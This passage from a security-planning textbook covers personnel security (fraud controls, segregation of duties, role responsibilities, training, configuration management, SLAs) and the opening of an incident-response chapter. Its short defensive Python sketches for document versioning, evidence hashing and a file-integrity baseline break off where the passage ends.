Documentation serves as a contract to manage both employees and contractors. A second goal of this chapter is to discuss documentation aspects of managing projects, enforcing accountability, and tracking internal documents (Configuration Management and Change Management), as well as the development of external contracts (Service Level Agreements). Another major goal of personnel security is fraud prevention. Approximately 14% of breaches are attributed at least in part to internal employees. Employees about to leave or who have left the organization cause 70% of internal information theft [3]. This can be caught by monitoring changes in access patterns to information. Much of it can be prevented by disabling all corporate accounts and access permissions for terminating employees. In this chapter, we will look first at the risk of fraud. Second, it is important to document security responsibilities for employee roles. Third, it is important to train for those roles. Finally, it is important to provide the tools required for those security roles to accomplish their jobs.

12.1 Step 1: Controlling Employee Threats

Personnel and customers are both a potential weakness in the security defense system, as well as a potential source of fraud. Many of these threats are industry specific. For example, a bank would be susceptible to the sale of credit card numbers and the creation of fake accounts with transferred money. Table 12.1 on Personnel Threats lists example threats to Einstein University that could be subverted by staff. This table considers which roles are most likely to be involved in each fraud or security vulnerability, and the potential liabilities. While this task is somewhat repetitive with risk management, it is amazing what new important ideas come up when we focus on staff, instead of the external threats we tend to emphasize during risk analysis. Therefore, it is a good idea to think of threats independently now, then copy over any employee-related threats from the Risk chapter (and perhaps add the new threats to the Risk chapter!)
Our next job is to consider controls for these risks. The most significant control is Segregation of Duties, which was introduced in Chap. 2. Here we will apply the concepts. Remember that good management ensures that no one person can defraud the system. Roles are categorized into Origination, Authorization, Verification, and Distribution, which originate, approve, double-check, and act on, respectively.

Table 12.1  Listing personnel threats (workbook exercise)
Threat | Role | Liability or cost if threat occurs
Divulging private info | Employee | FERPA violation = loss of federal funds
Skim payment cards | Salesperson, IT | PCI DSS, state breach violation
Grant abuse | Employee with grant | Loss of funds from US granting agencies
Abuse of student | Employee, student, visitor | Bad press – loss in reputation; may incite lawsuit


These will be implemented in the computer system using authorization (logins, forms) and access control (permissions). Figure 12.1 shows business relationships in a larger organization, which includes software development [4]. Notice that Security/Compliance would tend to 'authorize' aspects of software development, while quality control 'verifies' software development. System/network admin 'distributes' software to the business, which is the user. Audit 'verifies' all other systems at a high level, by verifying that their processes are defined safely and adhered to. These authorization/verification types of activities add a layer of approval. If separation of duties is not attainable due to organization size, job rotation and mandatory vacations are compensatory controls. Techniques that help to prevent security breaches and fraud and/or shorten the duration of undetected fraud include preventive and detective/deterrence controls, such as [4–7]:
Preventive Controls:
• Chief Information Security Officer: Naming a CISO (or at least a Security Manager for small companies) makes someone responsible for security. A dedicated person allocated to the security function (whatever the title) is a requirement of the E.U.'s GDPR and the U.S.'s HIPAA, Gramm-Leach-Bliley and FISMA. Other important personnel functions include (defined elsewhere):
  • Data Owner, Process Owner: Allocates permissions, defines safe processes.
  • Info Security Steering Committee: Management with knowledge of business and/or security functions defines security (e.g., working with the Security Workbook).
  • Incident Response Management/Team: Decides or performs functions related to incident response.
  • Security Analyst, Security Administrator: Security staff to design or implement security functions.

Fig. 12.1  Business relations for Segregation of Duties


• Security awareness training: Discussion of organization policies, legal compliance, appropriate password selection, appropriate use of computers, appropriate handling of confidential or proprietary information, recognizing social engineering, and reporting security events.
• Training and written policies and procedures: Include appropriate skills and knowledge of standards to do the job. Payment card policies regarding handling and security are necessary for those handling sales. Training to recognize and report fraud can be geared towards specific employees and management. Management, IT, software development and security teams need more extensive training in information security.
• Signed agreements: List job responsibilities, security requirements, confidentiality agreement, and proper computer (e.g., email) use. Three recommended policies for employees and one for contracts include [8]:
  • Code of Conduct: Describes general ethical behavior requirements.
  • Acceptable Use Policy: This should address what, when, where, how and why company data can be accessed. If a mobile device is used for business purposes, it should address who can use the device: children are off-limits. It should address what is an allowable device for accessing organizational data (e.g., personal devices) and how the organization's devices can be used (e.g., permissible websites, installing software, cloud use).
  • Privacy Policy: Defines proper behavior in regards to company confidential information, such as regulatory requirements. Includes policies on password quality and secrecy, maintaining physical security, locking terminals, and reporting security issues.
  • Service Level Agreement: This contract specifies required levels of service between a customer and provider. There is a separate subsection on this later in this chapter.
• Ethical Culture: To combat fraud, it is not sufficient to merely write policies; management must live, mentor and insist on ethical behavior.
• Employee Support Programs: Help employees cope with personal and financial problems before they become unmanageable.
• Background checks: Background checks are important for any employee who handles protected identifiable information (PII) or payment cards. It is also a good idea to screen security and system administrators, since they often have full privileges on computers.
• Need to Know/Least Privilege: As per information security requirements, these define the minimal access to information per role. PCI DSS requires a list of roles with documented business need, including reasons why those roles should be able to view payment card primary account numbers [7].
Detective (and Deterrence) Controls include:
• Fraud reporting or hotline mechanism: Customers and employees can discreetly (and preferably also anonymously) report potential fraud to internal audit, an ethics officer, or an independent agent. This may include rewards for whistleblowers.


• Identification badges: Badges help to distinguish between onsite employees, contractors and visitors. All badges should be strictly controlled, with visitor badges expiring and surrendered daily. The visitor log should be retained for three months or more [7]. Badges are required by PCI DSS for sensitive areas where cardholder data is processed or stored.
• Logged transactions: Some transactions should be logged, providing the potential for review. Computer systems normally log important events like clearing the logs, changing log or security configurations, logging on or off a system, installing software, etc. HIPAA requires personnel to log medical transactions. Any adjustment of financial or monetary transactions should also be logged. Some of these transactions should be authorized by a manager before implementation.
• Internal Audit Department and Surprise Audits: These are effective means to detect and deter fraud, and ensure compliance.
• Mandatory vacations or job rotation: Inappropriate performance will eventually be recognized.
Corrective Controls include:
• Employee Bonding: Insurance protects against losses due to theft, mistakes and neglect. (This is illegal in some countries.)
• Fidelity Insurance: Insurance against fraud or employee misdeeds is useful for rare but expensive risks.
Table 12.2 considers how specific threats from Table 12.1 can be controlled using segregation of duties or another control listed above.

Table 12.2  Example personnel controls for Einstein University (workbook exercise)
Threat | Role | Control
Divulging private info | Employee: instructor, advisor, registrar, administrator | FERPA security and training: annual quiz, new employee training
Grant abuse, travel abuse | Employee with grant or funding | Financial controls: employee's administrator and financial office double-check expenses
Abuse of student | Instructor, advisor, or any employee who deals with students | Background check at hiring. Policy of warning, monitoring and termination upon repeated offense
Abuse of financial information, payment card theft | Salespersons with access to PoS; IT or security staff with access to financial information | Background check at hiring. Policy of suspension, review and termination upon substantiated suspicion. Adhering to PCI DSS. Regular monitoring of devices


12.2 Step 2: Allocating Responsibility to Roles

At this point we have (hopefully) thoroughly considered all threats caused by insiders. We can now proceed to our second major personnel goal: coordinating responsibilities and training across our staff. This is a coordinated effort which considers all the other chapters in the Workbook, including: policy, risk, business continuity, information security, network security, physical security, incident response, personnel security (previous tables), and metrics. In Table 12.3, two positions have Workbook-suggested job responsibilities (in regular type), while university-specific responsibilities are shown in italic script. In the table below, it may be useful to specify a name next to a role, such as a manager or department name.

Table 12.3  Responsibility of security to roles (workbook exercise)
Role | Responsibility
Chief Info Security Officer: John Doe | Lead Info Sec. Steering Committee and incident response teams. Lead efforts to develop security policy, security workbook. Manage security projects, budgets, staff. Lead security training for required staff on FERPA, PCI DSS, HIPAA, state breach. Maintain security program: metrics, risk, testing, and policy revisions.
Personnel: Alice Strong | Participate in Information Security Steering Committee, Incident Management Team. Track and document theft (to determine pattern). Prepare/manage third-party contracts, establishing expectations relative to security. At hiring: Perform background check for persons handling confidential info/major assets or interfacing with students. Write job description considering segregation of duties, security responsibilities. Employee: signs Acceptable Use Policy; takes security awareness training including compliance, policy training. At termination: Revoke computer authorization, return badges/keys and equipment, notify appropriate staff.
Security Admin | Monitor logs for secure systems daily. Enable/disable permissions according to data owner's directions. Configure security appliances; audit equipment. Rebuild computers after malware infection. Investigate incidents and collect security metrics as part of Incident Response Team.
Registrar | Establish FERPA and security training. Data Owner: student scholastic and financial information. Oversee FERPA adherence in Registration dept.
Office Admin., Advisor | Adhere to FERPA; attend security and FERPA training. Retain locked cabinets with student info.
Managers of staff handling payment card sales | Ensure sales staff is trained in pertinent PCI DSS requirements. Inspect PoS machines per shift.


This table will turn into a description of security job responsibilities for each position. Note that these descriptions are simply suggestions, and you may edit them in the Security Workbook as you like. It is highly recommended that someone act as a Chief Information Security Officer. This role is required by HIPAA. In larger organizations it should be a full-time position.

12.3 Step 3: Define Training for Security

Now that we have an idea of the security roles and responsibilities, we need to make sure that employees are trained to perform their security responsibilities – and consider which documents and written procedures will help them to perform each role. Training can be required before hiring, taught at hiring, and thereafter performed periodically. There are three types of security training: security awareness for most employees, security training for people involved with security, and security education for security specialists. Security awareness and other training is a requirement of most security regulations.
Security Awareness  This training is important for nearly everyone in the company, including anyone who uses a computer, handles payment cards, or accesses protected information or PII. Training can include contractors, vendors and partners. This training makes staff aware of organizational policies and trains them in permitted use of computers. Training occurs through single classes, meetings, web or video training, newsletters, quizzes and posters [12]. PCI DSS requires that training occur at hiring and at least annually thereafter. PCI DSS also requires that two mechanisms be used for training and that appropriate employees sign that they have understood the security policy [7]. Defined risks from Chaps. 1 and 2 of this text – which relate to your business – provide the kind of knowledge that all staff should be aware of. Specifically, this training may include smart computer use (choosing passwords, avoiding email and web viruses, recognizing potential malware issues, and (potentially) backing up work-related files) and recognizing or preventing fraud (recognizing social engineers, reporting security incidents, and securing confidential or proprietary information in paper or other media form) [12]. People should understand why the policy is in place and the consequences of non-adherence. Security awareness training is important, but it can be totally ineffective. Measuring whether staff (1) understand and remember security policies, and (2) implement security can help to determine the effectiveness of the training.
Security Training  Certain staff, such as medical staff, human resources, management, software developers, and IT, need security training specific to their responsibilities. This training is often received through workshops or conferences.


Security Education  Education is extended training used to prepare people whose primary responsibility involves security, such as auditors, risk managers, security analysts, software developers, and security administrators. Education develops both core skills and a high-level understanding. It is taught through a formal course, book learning and/or informal coaching. A list of topics deemed relevant to information security professionals is called the Common Body of Knowledge (CBK), and security certifications focus on these topic areas. Continuing education is important for those whose jobs involve a high level of security. Security is one of the fastest-moving fields, even compared to the fast-moving computer field. Security and incident response personnel must have annual security training, and most security certifications require annual training to remain certified. Table 12.4 shows the annual training requirements for various security certifications, given in hours of training required. Table 12.5 describes the training and documentation requirements needed for various roles with security functions. Table 12.5 has Workbook-suggested text for three positions, and a few university-specific roles. A final reminder is that to perform this chapter correctly, it helps to review all previous chapters to ensure that all security functions have been integrated into this Personnel chapter. You will also need to do that for the chapters on Metrics and Incident Response. Also, you will find that your evolved security understanding will help to improve your earlier chapters' work.

12.4 Step 4: Designing Tools to Manage Security

An important tool to manage IT people, projects, and security is documentation. Some documents are for external use, such as a contract (e.g., a Service Level Agreement, or SLA) which guides the agreement between two organizations. Some internal documents describe human resource policy, such as a Code of Conduct or Acceptable Use Policy, which guide personnel actions. Some internal documents track product or process changes, such as Configuration Management or Change Management, both of which retain golden artifacts of how a product or process has changed. Some internal documents are for use in product development, such as a security plan, design, or code implementation. These are described in the Secure Software section.

Table 12.4  Continuing education requirements for security certification
Security certification(s) | Minimum 1-year requirement (hours) | Minimum 3-year requirement (hours)
CISSP, CISA, CISM, CRISC, CEH | 20 | 120
SSCP, CAP, HCISPP | 10 | 60
Security+ | – | 50
Other CompTIA certificates | – | 20–75


Table 12.5  Requirements for security roles: training and documentation (workbook exercise)
Role | Requirements: training, documentation
Chief Info Security Officer | Training: Security certification required at hiring. Annual security maintenance training: 40 hours/year. Documentation: Development of Security Workbook, legal compliance checklist
Security Administrator, Security Analyst, CISO | Training: Security certification required at hiring. Annual security maintenance training: 17 hours/year. Documentation: Disaster Recovery Plan, Incident Response Plan
Registrar | Training: FERPA experience at hiring. Training every 1–3 years at national conference or workshop. Documentation: Development of FERPA Policy
Sales Manager, CISO | Training: Training to adhere to PCI DSS annually. Documentation: Payment Card Policy
Employee handling student data | Training: FERPA annual quiz. Documentation: University FERPA web page, signed acceptable use policy
Incident Response Management Team: CISO, select business mgmt., human resources, risk, legal, public relations, physical security, IT | Training: External training or led by CISO. Documentation: Incident Response Plan
Incident Response Team: Security and IT | Training: Internal and/or external training. Documentation: Incident Response Plan

12.4.1 Code of Conduct and Acceptable Use Policy

The Security Workbook has an example template for a Code of Conduct. However, ACM, IEEE and ISACA also have Codes of Conduct for their organizations that can serve as examples. For the Acceptable Use Policy, SANS has an extensive template. Many organizations list shorter versions online that can be adapted.


12.4.2 Configuration Management and Change Control

Important documents need to be recorded at specific moments in time, since they often serve as a contract within or between organizations. Documents evolve, and thus multiple versions of documents will need to be recorded and managed. This is the function of Configuration Management [9]. From an organizational perspective, configuration management helps control regulatory and policy compliance, provides documentation for audits, and serves as a source of information for incident response [10].
A configuration management system is a central repository, similar to an electronic library document management system. Important documents are maintained in this repository. For software development teams, this includes requirements, design and test documents, program code, and project, audit and security plans. The repository holds a snapshot of each version of a document, thereby maintaining a history, so that any version can be retrieved at any time. The document management system permits users to check out a document; edit, review or approve the document; and check it back in. Revised documents are allocated an increased version number. The revision author and reason for revision are recorded at check-in and are later available as part of the version history. A minimal sketch of such a version-history repository appears at the end of this subsection.
Change management is the process that creates the different configuration management versions. Change management usually starts with a change proposal: (1) a Change Request, which may be (2) analyzed and approved by management for implementation. The change is then (3) implemented (e.g., programmed or acted upon), and this change may be (4) tested and approved, when the change is ready for deployment. Documentation for each of these stages is maintained in a change management or configuration management repository, and emails may notify stakeholders of changes of status. At an organizational level, major changes need to be approved by upper management and then communicated to impacted users to get their support [5]. The communication shall explain how the change will affect them, its benefits and impact. After implementation, it is useful to obtain feedback on the product, training and any documentation.
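The following is a minimal sketch of the check-in/version-history behavior described above (a toy in-memory repository, not any particular document management product):

from dataclasses import dataclass, field
from datetime import datetime

@dataclass
class Version:
    number: int
    content: str
    author: str
    reason: str
    timestamp: datetime

@dataclass
class Document:
    name: str
    versions: list = field(default_factory=list)

    def check_in(self, content: str, author: str, reason: str):
        """Record a new version with author and reason, forming an audit trail."""
        v = Version(len(self.versions) + 1, content, author, reason, datetime.now())
        self.versions.append(v)

    def get(self, number=None) -> Version:
        """Retrieve any historical version (defaults to the latest)."""
        return self.versions[-1] if number is None else self.versions[number - 1]

doc = Document("Incident Response Plan")
doc.check_in("v1 text", "J. Doe", "Initial draft")
doc.check_in("v2 text", "A. Strong", "Added cloud provider contacts")
print(doc.get().number, doc.get().reason)   # 2 Added cloud provider contacts
print(doc.get(1).content)                   # v1 text

The key property is that old versions are never overwritten: any version, with its author and reason, can be retrieved at any time, which is exactly what an audit requires.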

12.4.3 Service Level Agreements
A Service Level Agreement (SLA) is a contract to outsource any IT or other sensitive service, potentially including networking, business continuity, security or information security. An SLA should cover the following sections, to ensure that performance, security, legal compliance, and payment are agreed upon [9]:
• Introduction and Scope of Work
• Performance, Tracking and Reporting
• Problem Management


• Compensation
• Customer Duties and Responsibilities
• Warranties and Remedies
• Security
• Intellectual Property Rights and Confidential Information
• Legal Compliance and Resolution of Disputes
• Termination of Contract
• Schedules and General Signatures

Note that most regulations, including the GDPR and the U.S. regulations HIPAA, FISMA and Gramm-Leach-Bliley, as well as the PCI DSS standard, require that contractors meet these regulations to the same level as the contracting company. These contracts must ensure competence and full adherence to regulation when confidential information is involved. PCI DSS requires that a list be maintained of all such service providers, detailing their specific services, and that they are monitored annually for compliance [7]. More information on SLAs can be found online at www.service-level-agreement.net.

12.5 Questions and Problems
1. Vocabulary. Match each meaning with the correct vocabulary.
Security education | Security training | Acceptable use policy | Change control | Service level agreement | Configuration management

(a) A document addressing what, when, where, how and why company data may be accessed.
(b) A contract which specifies required standards of service between a customer and provider.
(c) Comprehensive training for people whose primary role is security.
(d) Security training for a particular role or function.
(e) A central repository for document management.
(f) A process to track and record modifications to equipment, software or documentation.
2. Segregation of Duties. Consider an industry you currently work in or would like to work in. Draw a Segregation of Duties diagram, similar to Fig. 12.1, for this industry. Include roles and labels for each arrow relationship. Describe in text how segregation of duties is implemented (or not) for this industry. If it is not implemented, describe some options for how it could be, or how compensating controls (mandatory vacations or job rotations) could help.
3. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook Personnel Security Chapter to complete the tables. For each table, add at least 3–5 entries.
(a) Create a 'Personnel Threats' Table, similar to Table 12.1.
(b) Create a 'Personnel Controls' Table, similar to Table 12.2.
(c) Create a 'Responsibility of Security to Roles' Table, similar to Table 12.3.
(d) Create a 'Requirements for Security Roles: Training and Documentation' Table, similar to Table 12.5.
4. Security Certifications. Do research on three of the following security certifications: Security+, CISSP, SSCP, HCISPP, CISA, CISM, CRISC and CEH. What does each certification strive to achieve? Develop a table which shows the subject areas that each covers. The subject areas can be the chapter topics of this book: Security Awareness/Malware, Fraud, Regulation, Risk, Business Continuity, Security Governance, Information Security/Authentication/Access Control, Network Security/Wireless, Physical Security, Personnel Security, Incident Response, Metrics, Audit, Software/Application Security. You can learn about the certifications by looking at each certification website or at the chapter headings in the table of contents of a study guide for each. Do you see differences in expertise between them?

12.5.1 Health First Case Study Problems
For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material.
Case study: Organizing personnel security (update the requirements document to include segregation of duties). Resources: Security Workbook, Health First Requirements Document. Other resources: HIPAA notes or slides.

References
1. Perlroth (2021) Are we waiting for everyone to get hacked? New York Times
2. Verizon (2022) Verizon 2022 data breach investigations report. https://www.verizon.com/business/resources/reports/dbir
3. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise.com/DBIR/2013. Accessed 20 Oct 2013
4. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 105–106, 117–119
5. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights, IL
6. ACFE (2014) Report to the nations on occupational fraud and abuse: 2014 global fraud study. Association of Certified Fraud Examiners (ACFE)
7. PCI Security Standards Council (2013) Requirements and security assessment procedures, v 3.0, November 2013. www.pcisecuritystandards.org
8. Cammarata C, Wilcox AS (2013) Going mobile. In: SC Congress Chicago
9. Gregory P (2008) IT disaster recovery planning for dummies. Wiley Publishing, Inc., Hoboken, pp 158, 257–258, 311–312
10. CIS (2021) CIS Critical Security Controls®, Version 8, May 2021. Center for Internet Security

Part IV

Planning for Detect, Respond, Recover

While preventive controls are extremely important and are generally prioritized as the most important type of control, the average time to identify a data breach was 212 days in 2021, with an additional 75 days to contain it [22]. This means there is plenty of room for improvement in the area of detective and corrective controls. This section focuses on measuring security effectiveness: do the controls work? How well do they work? It also deals with responding to inevitable security incidents.
When a security control is implemented, it must be tested for effectiveness. Executing a test plan can ensure that the control functions as planned: for example, that a firewall blocks illegal packets. The security system should then be monitored: e.g., how many illegal packets are traversing our internal network? This monitoring over time results in statistics or metrics that are periodically reviewed, and drives new risk analysis evaluations when security is not performing as desired. Finally, external auditors can verify that the security system is designed and managed properly. This section is about designing the review cycle: metrics and audit. Since testing can use the audit plan outline, the section on audit is also useful for designing a proper security test plan.

Chapter 13

Planning for Incident Response

We are under attack. But the Presidential Office is still standing. – Dmytro Shymkiv posted on Ukraine's Administration Facebook after the Russian NotPetya attack took down Ukrainian government and business sites on the eve of Ukraine's Constitution Day, conservatively totaling $10 billion in damages worldwide [1, p. 30]

What should you do? A hacker has penetrated your network and turned a server into a bot. You have a choice of closing the firewall down, closing the inner network down, closing the server down, or keeping everything up. Except for the last, each of these might stymie the attacker, but what is it also doing to your organization's business? If your business is a pharmacy, bringing the network down might make it impossible for customers to get lifesaving prescriptions. Leaving it up might enable the attacker to change multiple prescriptions, potentially killing someone. If your business is a bank, the intruder may walk away with millions of credit card numbers and Social Security numbers, while closing the network down might prevent the whole bank from operating. Your business could be a search engine, an airline serving thousands of passengers daily, or an automated factory producing goods.
The decision of how to react to an intrusion may impact customer service, customer security, organizational sales, and legal liability. This decision cannot be made lightly, and should be made at the highest levels of the institution, well before an attack actually occurs. Therefore, it is highly important that top management make strategic decisions about what should happen when an intruder is poking around sensitive organizational data. Top management must also be aware of the full implications of their decision, including business impact, security costs and regulatory liability. This issue is called Cyber Resilience.
This chapter uses the information developed in the Business Continuity chapter and is expanded upon in the Forensic Analysis chapter. This Incident Response chapter provides an overview of how the business should detect and respond to attacks, whereas the Forensic Analysis chapter covers a more technical analysis and legal preparation perspective.



13.1 Important Statistics and Concepts
An incident is defined as an event that "compromises the confidentiality, integrity, or availability of an information asset" [28, p. 4], whereas a breach is an unauthorized and confirmed disclosure of information. Examples of incidents include a hacker, fraud or terrorist attack. The difference between Business Continuity and Incident Response is that with Business Continuity, incidents often relate to failed IT systems, whereas with Incident Response, incidents relate to security threats to systems, networks and data, and may be defined as violating an organization's security policies [29]. Incident response issues may include loss of data confidentiality and non-repudiation. Since a security incident could result in temporary loss of IT, the Incident Response Plan should build upon or be integrated with the Business Continuity Plan, adapted for security threats.
So why is it important to plan for security incidents before they actually happen? Why, to save money and reputation, of course! The bad news is that it is REALLY expensive if you experience a data breach. (See Table 13.1, taken from IBM Security's 2022 Cost of a Data Breach Report [23].) Typical expenses after a data breach include hiring forensic experts to determine the full extent of and reason for the breach, and supporting your customers via a hotline, free credit monitoring subscriptions, and discounts on future services [2]. While these costs are substantial, they average only half the cost of customer maintenance after a breach, which includes loss of reputation, abnormal churn of customers, and increased customer procurement activities.
Unfortunately, incidents can take a long time to detect and fix. In 2022, IBM reported that the average time to identify a data breach was 207 days, plus an additional 70 days to contain it [23]. These numbers are averages; even in low years the average time totals over 255 days, giving an identify-and-fix range between 8.5 and 9 months [23]. Sometimes outsiders find the issues, including internet service providers, Information Sharing and Analysis Centers (ISACs) or other organizations, who often recognize communications with known suspicious sites (e.g., an attack originating from your network) [3]. Therefore, it is highly important to emphasize detective techniques, in addition to preventive techniques, to recognize intrusions and data breaches as early as possible.
Table 13.1 Incident response costs: IBM Security's 2022 cost of a data breach report [23]
• Detection and escalation (forensic investigation, audit, crisis management, board of directors involvement): average cost $1.44 million (33%)
• Notification (legal expertise, legal and customer communications): average cost $0.31 million (7%)
• Post-breach response (help desk and incoming communications, reissuing payment cards, identity protection services, regulatory fines, sale discounts): average cost $1.18 million (27%)
• Lost business (lost business due to system downtime, abnormal customer churn, customer procurement, goodwill): average cost $1.42 million (32.6%)


Some good news is that 78% of initial intrusions were rated as low difficulty. As the Verizon report states: "Some interpret attack difficulty as synonymous with the skill of the attacker, and while there's some truth to that, it almost certainly reveals much more about the skill and readiness of the defender" [3, p. 48]. So if you do a good job with planning, and implementing, security, you may have a much lower probability of an incident occurring… but be sure that third-party outsourcers and business partners are equally protected, because 40% of data breaches occur due to third-party error.
IBM's statistics on breaches indicate that the global average cost per breach is $4.87 million when the lifecycle exceeds 200 days, and $3.61 million otherwise [22]. With good preparation, you can encounter lower costs if a breach occurs. IBM Security's Cost of a Data Breach 2021 report [22] found that you can reduce the total data breach cost if your organization has an incident response team and performs testing (reduces cost by $2.46 million), a strong emphasis on regulatory compliance ($2.3 million), a mature implementation of zero trust ($1.76 million), a high standard of encryption ($1.25 million), and security automation ($3.81 million, with a good reduction in the time to find and contain the incident). Additional positive factors with an impact over a million dollars per breach included the use of artificial intelligence and security analytics. Factors raising the cost of a breach above a $5 million average included a high level of cloud migration and a large majority (81–100%) of employees working remotely; remote work also caused a longer delay in discovering and containing the breach.
The Incident Management Team (IMT) is the managerial team that designs the Incident Response Plan (IRP) [4]. The Information Security manager works with business management to prepare the IRP. Together, they strategize over how various security incidents should be handled and how incidents should affect business, IT, business continuity and risk management. The Information Security manager leads this team, which in a larger organization includes members from the Security Steering Committee and Incident Response Team. This management team also discusses budgets, evaluates schedules and performance, and reviews incident postmortem reports.
The Incident Response Team (IRT) is the technical team that handles a specific incident [4]. This team has technical knowledge relating to security, network protocols, operating systems, physical security issues, and malware. (This topic is substantially introduced in the Forensic Analysis chapter.) While these incident handlers and (if possible) investigators are the main members of the team, representatives from business management, legal, public relations, human resources, physical security, risk and IT also have important roles relating to their expertise following an incident. Although the IMT and IRT functions may differ, in actuality both teams may overlap considerably in personnel.
In smaller organizations, security and/or forensic expertise may not be available in house. In this case, the function must be outsourced to a qualified security/forensic organization, preferably a local one. For incident response purposes, external consultants will need full and timely Internet and physical access for their investigation, and will make quicker progress if internal technical staff are there to help [5].


Attacks by criminals may end up in court. Meaningful forensic data ('artifacts') must be authentic, pertinent and unaltered. Artifacts become evidence when presented in court [30]. The major authenticity concerns are that information obtained may have been altered by criminals, and that evidence may be modified before being presented in court. One problem is that criminals may delete incriminating logs or modify the system to lie about running processes and users, using a rootkit. Chain of custody addresses the second issue, ensuring that evidence is not altered before court. Chain of custody must be introduced at the start of evidence collection, and maintained throughout the forensic process.
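As a simple illustration of how evidence integrity can be documented, the Python sketch below hashes an artifact and appends a custody log entry. The record fields, file names and log format are assumptions made for this example, not a legal standard; actual chain-of-custody practice must follow legal counsel's guidance.

# A minimal sketch of preserving evidence integrity, assuming evidence is
# collected as files; field names and the log format are illustrative.
import hashlib
import json
from datetime import datetime, timezone
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash the artifact so later tampering is detectable."""
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def record_custody(artifact: Path, handler: str, witness: str, action: str,
                   log_path: Path = Path("chain_of_custody.jsonl")) -> None:
    # Each action on the artifact is logged with who, when, and a hash,
    # supporting the chain-of-custody record described above.
    entry = {
        "artifact": str(artifact),
        "sha256": sha256_of(artifact),
        "handler": handler,
        "witness": witness,
        "action": action,
        "timestamp": datetime.now(timezone.utc).isoformat(),
    }
    with log_path.open("a") as log:
        log.write(json.dumps(entry) + "\n")


# Example usage: record the initial collection of a disk image.
# record_custody(Path("server01.img"), handler="J. Doe", witness="K. Lee",
#                action="collected disk image")

Hashing at collection time, and re-hashing before presentation, lets an examiner demonstrate that the artifact has not changed while in custody.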

13.2 Developing an Incident Response Plan
An Incident Response Plan (IRP) addresses each stage of incident response. The stages of incident response [4, 6] are shown in Fig. 13.1. The first stage is Preparation, where the Incident Response Plan is developed and preparations to further protect the organization are implemented. This occurs BEFORE any incident occurs (hopefully). An incident triggers the Identification Stage. An employee may recognize a social engineering event, a system administrator may recognize an attack in system logs, or an intrusion detection device may recognize an attack signature. Once the attack is recognized, it is important to contain the incident: the intruder should not be able to expand the attack or do more damage. Defensive actions may include disconnecting or bringing down the application, system, and/or network, or modifying firewall access control to reject the connection (which will only delay further attacks). In the Analysis and Eradication Stage, the root cause of the attack is determined and attack software is recognized and removed from the network. After testing ensures the rebuilt system is ready for operation, the Recovery Stage brings the system back on-line again.

Fig. 13.1  Stages of incident response


If a data breach occurred, two additional stages are added: Notification and Ex-Post Response, in which victims are notified and offered redress. The Lessons Learned Stage reviews how the organization did as part of incident response, and how the procedures could be made clearer, faster and more effective. The next sections elaborate on each of these stages in detail, to help in planning for incident response.

13.2.1 Step 1: Preparation Stage
The purpose of the Incident Response Plan (IRP) is to decide in advance [4, 5]:
• Strategy: How will we detect incidents? What shall we do to prevent or discourage incidents from occurring (e.g., policies and warning banners at computer logon)?
• Containment: What should we do when different types of incidents occur? The BIA can help in determining critical assets and how incidents can be handled. When can the IRT confiscate or disconnect an employee's computer? If we call law enforcement, what actions do they recommend we take before they arrive?
• Escalation: When is the incident management team called? How can governmental agencies or law enforcement help? When do we involve law enforcement, who do we contact, how soon will they respond, and what should we expect?
• Preparation: What equipment do we need to handle an incident? Where on-site and off-site shall we keep the IRP?
Security threats that should be considered include: malware, unknown or unauthorized users, compromised servers, lost or stolen equipment, divulged secrets/files, (distributed) denial of service, written threats to IT, unidentified network objects (e.g., wireless, hosts), and modified information [5, 7]. Attack vectors (or source methods) may include removable media, flash drives, email, web, improper use, loss or theft, physical abuse, social engineering, etc.
To detect an incident, an organization must have detection and monitoring capabilities. The sooner the attacker can be found, the more limited the scope of the attack will be. Proactive detection mechanisms include [4, 5, 7, 26]:
• Antivirus software: Detects malware infections and may fix some infections. Antivirus is helpful on user terminals and in a centralized email server.
  – Endpoint Security Suite: Enterprise-level software includes antivirus/antispyware software and firewalls, but in addition verifies that operating system software is recently updated, and that only permitted (or allowlisted) applications are installed, or that forbidden software is not installed [8]. This software sends alerts or emails to a centralized system when problems are detected.
  – Email Server: Antivirus within the email server helps to reduce social engineering and malware attacks.


• System baseline: A listing of normal terminal configurations, including active processes and communications, can help to distinguish abnormal or suspicious configurations. This normal configuration is saved as a system baseline for future comparisons against suspicious computers (see the sketch after this list).
• Log management: Log management is required as part of comprehensive security regulations (e.g., HIPAA, FISMA, PCI DSS). It is important to consider which computer logs will best help to detect and analyze an attack, and how much storage is needed for them. Since it is important to correlate logs between different network and computer equipment, the Network Time Protocol ensures the network agrees on a precise time. Log management requires extensive time and technical expertise. For larger organizations, a SIEM tool collects system logs network-wide, coordinates and correlates logs, and tracks the status of incidents to closure. See Fig. 13.2 for important logs to collect.
• Vulnerability testing: Periodic automated or manual testing ensures that servers and network equipment are configured to withstand common attacks, including that servers are patched and security configuration options are adequate. PCI DSS requires quarterly testing. It is recommended that vulnerability tests be run automatically every day, with results compared against known good results [8].
• Protocol sniffer: These tools record and decipher packets traveling across the network. A professional knowledgeable about network protocols will be able to inspect and search through packets when an incident is suspected. Use of artificial intelligence, or inspecting 3 h of unusual traffic per week, may discover an intrusion [8].
• Intrusion detection/prevention systems: Network Intrusion Detection/Prevention Systems (NIDS/NIPS) and Host Intrusion Detection/Prevention Systems (HIDS/HIPS) automatically recognize attack signatures and abnormalities. These tools are often configured to recognize exfiltration (the copying of sensitive data), unauthorized accounts, and unusual patterns of data access.
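The following minimal Python sketch illustrates the system baseline idea from the list above: record hashes of important files once, then compare later snapshots against the saved baseline. The watched paths and snapshot file name are assumptions for illustration; a real baseline would also cover active processes and network connections.

# A minimal sketch of a file-integrity baseline; paths are example choices.
import hashlib
import json
from pathlib import Path

WATCHED = [Path("/etc/passwd"), Path("/etc/ssh/sshd_config")]  # example paths


def snapshot(paths) -> dict:
    """Record a hash per watched file as the known-good baseline."""
    result = {}
    for p in paths:
        result[str(p)] = hashlib.sha256(p.read_bytes()).hexdigest()
    return result


def compare(baseline: dict, current: dict) -> list:
    """Report files that changed, appeared, or disappeared since the baseline."""
    findings = []
    for path in baseline.keys() | current.keys():
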